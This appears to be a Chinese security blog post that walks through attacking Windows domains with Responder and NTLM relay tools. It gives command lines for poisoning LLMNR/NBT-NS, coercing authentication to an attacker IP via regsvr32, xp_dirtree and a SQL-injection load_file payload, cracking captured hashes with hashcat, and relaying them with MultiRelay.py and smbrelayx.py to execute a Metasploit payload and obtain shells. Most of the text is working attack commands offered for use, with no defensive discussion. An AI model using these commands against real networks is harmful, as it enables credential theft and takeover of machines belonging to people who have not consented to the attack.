【域渗透】 多种方式配合Responder&NTLM中继攻击

  • A+
所属分类:安全文章

Part(一):

一、Responder简介:

①Responder工具可以污染LLMNR和NBT-NS请求,当网络上的机器尝试用LLMNR和NBT-NS去请求目的机器时,Responder会伪装成目的地机器。当受害机器尝试登陆攻击者机器,responder就可以获取受害者机器用户的NTLMv2哈希值。但是,Responder通常抓取的只是Net-NtlmHash,无法用来hash传递,所以要使用例如hashcat等工具破解出明文密码再利用。


②在实际渗透中,如果我们没有获得目标的任何有用信息和重要凭证,就可以利用Responder进行监听抓取凭证,并且Responder是不会主动响应任何请求,只会对流量进行分析。



二、利用Resonder抓取hash:

1.首先在攻击者vps上开启Responder的监听

python Responder.py -I eth0 -v

【域渗透】 多种方式配合Responder&NTLM中继攻击

【域渗透】 多种方式配合Responder&NTLM中继攻击



2.然后在受害机器上执行net use尝试与攻击机建立连接

①通过SMB服务

目标机器执行:

net use \192.168.1.2

【域渗透】 多种方式配合Responder&NTLM中继攻击


可以看到,Responder成功抓取到hash

【域渗透】 多种方式配合Responder&NTLM中继攻击


②通过WPAD代理服务器

vps执行时带上-F参数:

python Responder.py -I eth0 -v -F


等待目标机器使用IE浏览网站,即可抓取到Net-NTLM hash

【域渗透】 多种方式配合Responder&NTLM中继攻击

可以看到,Responder成功抓取到hash

【域渗透】 多种方式配合Responder&NTLM中继攻击



lregsvr32配合responder抓ntlm hash:

regsvr32 /s /u /i://192.168.136.144/@OsandaMalith scrobj.dll

【域渗透】 多种方式配合Responder&NTLM中继攻击



lxp_dirtree配合responder抓ntlm hash:

exec xpdirtree '\your-ipxxx'

【域渗透】 多种方式配合Responder&NTLM中继攻击


抓取结果:

【域渗透】 多种方式配合Responder&NTLM中继攻击



lsql注入loadfile()配合responder抓ntlm hash:

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('\\192.168.136.144\xxxx'),3--+

【域渗透】 多种方式配合Responder&NTLM中继攻击


抓取结果:

【域渗透】 多种方式配合Responder&NTLM中继攻击





三、利用hashcat进行破解

hashcat -m 5600 Net-NtlmHash值 密码字典文件路径 --force

【域渗透】 多种方式配合Responder&NTLM中继攻击


可以看到成功被破解出明文:panda123

【域渗透】 多种方式配合Responder&NTLM中继攻击




四、NTLM中继攻击

1.对responder.conf文件进行修改,将SMB和HTTP的值改为off,这样responder就不会获取哈希值,而是交给中继脚本完成。

脚本工作原理:会通过抓取高权限的hash,然后转发给低权限机器,如果认证成功则进而执行命令,获取权限

【域渗透】 多种方式配合Responder&NTLM中继攻击


2.VPS重新开启Responder监听:

①利用HTTP协议进行中继攻击:

python Responder.py -I eth0 -v -F

【域渗透】 多种方式配合Responder&NTLM中继攻击


②利用SMB协议进行中继攻击:

python Responder.py -I eth0 -v

【域渗透】 多种方式配合Responder&NTLM中继攻击



3.利用Responder工具中tools目录下的RunFinger.py识别SMB signing

python RunFinger.py -i 192.168.1.0/24

【域渗透】 多种方式配合Responder&NTLM中继攻击

因为只有SMB signing为false的可以进行中继攻击



4.MultiRelay.py进行中继攻击

VPS另一终端执行:

python MultiRelay.py -t 域内机器ip -u ALL

【域渗透】 多种方式配合Responder&NTLM中继攻击


①然后只要域控机器或者高权限机器利用浏览器上网,就能拿到域内目标主机的shell

【域渗透】 多种方式配合Responder&NTLM中继攻击


②然后只要域控机器或者高权限机器发出任何SMB协议的请求,就能拿到域内目标主机的shell

【域渗透】 多种方式配合Responder&NTLM中继攻击


然后就可以执行脚本自带的命令,例如:

【域渗透】 多种方式配合Responder&NTLM中继攻击



Part(二):

一、利用impacket工具集中的脚本进行中继攻击:

1、smbrelayx.py

工作原理:在VPS伪造一个恶意的SMB服务器,当内网中有机器访问这个SMB服务器时, smbrelayx.py 会抓到 的A主机的 hash ,然后用抓取到的的hash重放给B主机 ,重放成功则会导出B主机本地的用户和 hash


①还是修改Responder.conf,然后开启监听:

python Responder.py -I eth0 -v

【域渗透】 多种方式配合Responder&NTLM中继攻击


②smbrelayx.py开启伪造SMB服务器

smbrelayx.py -h 192.168.1.20 -e ./shell.exe    #-h 目标ip,-e指定一个文件

【域渗透】 多种方式配合Responder&NTLM中继攻击


当域控上请求了我们伪造的SMB服务,就会执行指定的msf马

【域渗透】 多种方式配合Responder&NTLM中继攻击


可以看到MSF成功上线,为了保险起见,尽快迁移进程

【域渗透】 多种方式配合Responder&NTLM中继攻击



2、ntlmrelayx.py待更新。。。

python ntlmrelayx.py -t 目标ip

【域渗透】 多种方式配合Responder&NTLM中继攻击






☆ END ☆

点个赞和在看吧,欢迎转发!

【域渗透】 多种方式配合Responder&NTLM中继攻击



本文始发于微信公众号(哈拉少安全小队):【域渗透】 多种方式配合Responder&NTLM中继攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: